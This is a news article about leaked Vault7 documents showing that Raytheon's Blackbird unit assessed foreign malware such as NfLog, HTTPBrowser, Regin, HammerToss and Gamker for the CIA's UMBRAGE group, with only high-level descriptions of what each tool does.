The CIA’s cozy malware relationship with defense contractor revealed
The new documents, released as part of WikiLeaks’ CIA hacking Vault7 series, show that Raytheon worked as a CIA contractor reporting to the spy agency’s Remote Development Branch’s UMBRAGE group.
Raytheon reported to the CIA about malware thought to have come from foreign governments, like Russia and China.
Raytheon is a defense contractor specializing in homeland security and defense technology, and is the company behind the Tomahawk missiles fired at Syria by President Trump.
Previous Vault7 documents have revealed Umbrage collects hacking exploits unleashed by other countries, enabling them to disguise its own hacks.
The trail starts from November 2014, two weeks after Raytheon had acquired Blackbird Technologies.
At the time, it said Blackbird would expand its “special operations capabilities in tactical intelligence, surveillance and reconnaissance, secure tactical communications and cybersecurity.”
Blackbird Technologies was a cyber security and surveillance company that supplied equipment for covert “tagging, tracking and locating” and counted US Special Operations Command as one of its biggest customers.
In 2011, a retired special operator described Blackbird Technologies’ work as being “heavily weighted towards the dark side.”
The documents included are assessments of malware, partly based on public documents from security researchers and private companies. Blackbird recommended whether the CIA should use the malware to develop its own projects.
NfLog - Remote Access Tool by Samurai Panda
A September 2015 report on a new variant of the NfLog Remote Access Tool (RAT) – a tool which allows an intruder administrative control over a target – IsSpace used by SAMURAI PANDA, details how the malware credited to the Chinese hacking group Samurai Panda targets C2 servers to sniff user credentials.
On systems with a Windows Firewall “it will attempt to enumerate the basic authorization username and password used for most proxy authentications using HTTP.”
If NfLog sees a user has administrative privileges, it will attempt to give itself increased permissions.
HTTPBrowser by Emissary Panda
Another September 2015 document details a new variant of the HTTPBrowser Remote Access Tool used by Emissary Panda, thought to be another Chinese hacking group.
The RAT is deployed through an “unknown initial attack vector,” the document reads. It contains a self-extracting zip file which includes three files used to deploy the malware.
It captures keystrokes and writes them to a file. The document describes the RAT’s use of clear text as an indication of its “low level of sophistication” and says there are no new techniques worthy of a PoC.
Regin - Stealthy Surveillance
Reign is described as being a “very sophisticated malware sample” which has been observed in operation since 2013, but the September 2015 document adds it may have been in use since 2008. The complex malware has been linked to GCHQ and NSA.
The “target surveillance and data collection” malware has six stages of implementation.
The report’s author appears impressed by Reign, which it commends for its “striking” modular architecture and “flexibility” and impressive stealthiness.
Reign allows for tailored attacks for different targets and has the ability to “hide itself from discovery.”
The report notes that it doesn’t contain details on how aspects of Reign are implemented. “We assume bad actors have valid certs [for driver signing] but it’s not clear from the report,” it says.
Reign was discovered by Symantec, which described it as a trojan data collection tool that can take “screenshots and [take] control of the mouse’s point-and-click functions, steal passwords, monitor network traffic,” and scan for deleted files.
Symantec found it was likely created by a nation state.
HammerToss - Stealthy Tactics by Russians
A September 2015 report details HammerToss, a “suspected Russian State-sponsored malware” which leverages Twitter accounts, GitHub and cloud storage to “orchestrate command and control functions.”
HammerToss uses an algorithm to create Twitter accounts each day. When an attacker creates the account, the hacker posts a URL and hashtag, which sends the malware to a Github image that’s downloaded and contains commands.
Gamker is described as an information stealing Trojan which steals information using simple decryption and injects itself into a different process.
Trojan malware is often disguised as regular software. Its self-code injection ensures nothing is written to disk. The report doesn’t say who is suspected of creating Gamker.